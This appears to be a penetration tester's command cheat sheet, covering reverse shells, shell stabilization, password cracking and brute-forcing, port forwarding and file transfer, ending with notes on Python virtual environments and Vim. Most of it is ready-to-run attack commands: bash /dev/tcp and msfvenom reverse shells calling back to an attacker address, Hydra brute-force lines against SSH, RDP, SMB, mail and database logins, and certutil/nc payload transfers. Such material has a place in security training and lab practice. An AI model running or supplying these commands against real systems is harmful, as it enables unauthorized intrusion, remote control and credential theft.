Reverse Shells

Stabilize Shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl + z
stty raw -echo; fg
stty rows 38 columns 116

script /dev/null -c bash

MSFVenom

msfvenom --list payloads

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=443 -f elf > shell.elf

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=443 -f exe > shell.exe

Bash

bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'

echo '#!/bin/bash
bash -i >& /dev/tcp/<IP>/<PORT> 0>&1' > /tmp/shell.sh

Password Attacks

Hashcat

hashcat <HASH> <WORDLIST>
hashcat -m <MODE> <HASH> <WORDLIST>
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt

0   MD5
100 NTLM
1800 SHA512crypt

John

find / -type f -name "*2john" 2>/dev/null

<tool>2john <FILE> > john.hash

john --wordlist <WORDLIST> john.hash

Hydra

# -l Username
# -L Username List
# -p password
# -P password List

hydra -l admin -P /path/to/password_list.txt http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"

hydra -l admin -P /path/to/password_list.txt ftp://192.168.1.100

hydra -l admin -P /path/to/password_list.txt ssh://192.168.1.100

hydra -l admin -P /path/to/password_list.txt smb://192.168.1.100

hydra -l admin -P /path/to/password_list.txt smtp://mail.server.com

hydra -l admin -P /path/to/password_list.txt mysql://192.168.1.100

hydra -l admin -P /path/to/password_list.txt mssql://192.168.1.100

hydra -l admin -P /path/to/password_list.txt rdp://192.168.1.100

hydra -l user@example.com -P /path/to/password_list.txt pop3://mail.server.com

hydra -l user@example.com -P /path/to/password_list.txt imap://mail.server.com

hydra -P /path/to/password_list.txt vnc://192.168.1.100

Port Forwarding

Chisel

chisel server -p 4444 --reverse

chisel client <IP>:4444 R:<PORT>:127.0.0.1:<PORT>
.\chisel.exe client <IP>:4444 R:<PORT>:127.0.0.1:<PORT>

SSH

ssh -L <PORT>:127.0.0.1:<PORT> <USER>@<IP>

#Dynamic /w proxychains
ssh -D 1080 <USER>@<IP>
proxychains <program>

File Transfer

python3 -m http.server
sudo python3 -m http.server 80

SCP

scp -i ~/.ssh/id_rsa source_file user@remote_host:/remote/path

scp source_file user@remote_host:/remote/path #Upload
scp user@remote_host:/remote/file /local/destination #Download

scp -P <PORT> -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no user@remote_host:/remote/file /local/destination

Certutil

certutil.exe -urlcache -f http://IP:<PORT>/<FILE> <OUTPUT FILE>

WGET

wget http://<IP>:<Port>/<File>

Curl

curl http://<IP>:<PORT>/<FILE> -o <FILE>

SMB Share

sudo impacket-smbserver share -smb2support .
sudo impacket-smbserver share -smb2support . -user test -password test123

net use \\IP\share
net use \\IP\share /user:test test123

copy \\IP\share\File File

#Mount Share
net use Z: \\IP\share
Z:
dir
copy File .

PowerShell IWR

powershell iwr http://<IP>/file -OutFile file

NC

nc -lvnp 4444 > file #upload
nc <IP> 4444 < file #download

Other

File Creation

cat << 'EOF' > <FILE>
<TEXT>
EOF

echo '' > <File>

Python Virtual Environment

python3 -m venv <NAME> #create venv
source <NAME>/bin/activate #start venv
deactivate   # leaves venv
rm -rf venv  # deletes venv

Vim Macros

VIM CHEAT SHEET

hoMovement
h        # Left
j        # Down
k        # Up
l        # Right

0        # Beginning of line (absolute start)
^        # First non-whitespace character
$        # End of line

w        # Move to start of next word
e        # Move to end of word
b        # Move to beginning of previous word

Editing
d        # Delete
c        # Change (delete + insert)
y        # Yank (copy)

dw       # Delete word
cw       # Change word
yw       # Copy word
dd       # Delete line
yy       # Copy line

p        # Paste after cursor

Undo / Redo
u        # Undo
Ctrl+r   # Redo

Modes
i        # Insert before cursor
a        # Insert after cursor
I        # Insert at first non-whitespace
A        # Insert at end of line
o        # New line below
O        # New line above
Esc      # Return to normal mode

Macros
q<letter>     # Start recording macro
q             # Stop recording
@<letter>     # Run macro
10@<letter>   # Run macro 10 times
@@            # Repeat last macro

Useful
.        # Repeat last change
%        # Jump between matching brackets

TMUX